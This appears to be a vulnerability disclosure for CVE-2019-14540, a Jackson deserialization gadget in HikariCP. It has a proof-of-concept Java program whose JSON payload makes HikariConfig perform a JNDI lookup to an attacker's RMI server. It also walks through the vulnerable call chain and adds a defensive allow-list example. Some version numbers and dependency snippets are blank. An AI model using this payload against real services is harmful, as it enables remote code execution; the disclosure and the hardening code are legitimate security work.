CVE-2019-14540: Another gadget to exploit the default typing issue (Jackson 2.x - and 2.10.0.pr1)

I found a new remote command execution gadget in the HikariCP package. This gadget has been successfully tested on the newest version of Jackson (2.10.0.pr1).

The requirements are as follows.

  • Default typing is enabled
  • Jackson version 2.x -
  • The classpath contains HikariCP


1. Import the latest version of Jackson.

        <!-- -->

2. Import HikariCP.

        <!-- -->

Alternatively, import another package that bundles HikariCP, for example the well-known task scheduling framework Quartz.


Proof of concept

import com.fasterxml.jackson.databind.ObjectMapper;

import java.io.IOException;

/**
 * @author 浅蓝
 * @email
 * @since 2019/7/31 14:15
 */
public class HikariTest {

    public static void main(String[] args) throws IOException {
        // The type id in the array selects HikariConfig; the value is fed to setMetricRegistry
        String json = "[\"com.zaxxer.hikari.HikariConfig\",{\"metricRegistry\":\"rmi://\"}]";
        ObjectMapper objectMapper = new ObjectMapper();
        // Default typing must be enabled for Jackson to honour the type id in the input
        objectMapper.enableDefaultTyping();
        // Deserialization calls HikariConfig.setMetricRegistry, which performs the JNDI lookup
        objectMapper.readValue(json, Object.class);
    }
}


First, enable default typing, then trigger deserialization.



This demo connects to the attacker's malicious remote RMI server.

This gadget works in versions ,, 2.9.9, 2.8.9.

Detail of this gadget

In the latest release version of HikariCP (3.3.1), the class com.zaxxer.hikari.HikariConfig has a method called setMetricRegistry.


setMetricRegistry delegates to getObjectOrPerformJndiLookup.


In getObjectOrPerformJndiLookup, the string parameter is passed to the lookup method of an InitialContext object, which performs a JNDI lookup on it.

In older versions of HikariCP, setMetricRegistry lived in the parent class AbstractHikariConfig; the same gadget still works there.
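As an added defensive counterpart (not code from the original post), the following shows how the blanket enableDefaultTyping() used in the PoC can be replaced by an explicit PolymorphicTypeValidator allow-list (Jackson 2.10 or later), so that a payload naming com.zaxxer.hikari.HikariConfig is rejected before any setter, and therefore the JNDI lookup behind setMetricRegistry, can run; the com.example.model. package prefix and the placeholder metricRegistry value are assumptions.

```java
import com.fasterxml.jackson.databind.ObjectMapper;
import com.fasterxml.jackson.databind.ObjectMapper.DefaultTyping;
import com.fasterxml.jackson.databind.exc.InvalidTypeIdException;
import com.fasterxml.jackson.databind.jsontype.BasicPolymorphicTypeValidator;
import com.fasterxml.jackson.databind.jsontype.PolymorphicTypeValidator;

import java.io.IOException;

/**
 * Added example, not the original post's code. Builds an ObjectMapper whose
 * polymorphic type ids are restricted to an application-controlled package
 * (placeholder prefix "com.example.model."), so arbitrary classes such as
 * HikariConfig are never instantiated from input.
 */
public class SafeDefaultTyping {

    public static ObjectMapper hardenedMapper() {
        PolymorphicTypeValidator ptv = BasicPolymorphicTypeValidator.builder()
                // Only classes under this prefix may be named as a type id
                .allowIfSubType("com.example.model.")
                .build();
        ObjectMapper mapper = new ObjectMapper();
        // Replacement for the deprecated enableDefaultTyping(): every type id
        // found in the input is checked against the validator first
        mapper.activateDefaultTyping(ptv, DefaultTyping.NON_FINAL);
        return mapper;
    }

    /** Returns true if the mapper refused the type id carried by the payload. */
    public static boolean rejectsPayload(ObjectMapper mapper, String json) {
        try {
            mapper.readValue(json, Object.class);
            return false;
        } catch (InvalidTypeIdException e) {
            // e.getTypeId() is the denied class name; worth logging for detection
            return true;
        } catch (IOException e) {
            // Some other parse/mapping failure, not a type-id rejection
            return false;
        }
    }

    public static void main(String[] args) {
        // Constructed sample with the shape of the PoC payload but no JNDI target
        String payload = "[\"com.zaxxer.hikari.HikariConfig\",{\"metricRegistry\":\"placeholder\"}]";
        System.out.println("rejected: " + rejectsPayload(hardenedMapper(), payload));
    }
}
```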


Finally, thanks to my friend @lonelyrain for the translation.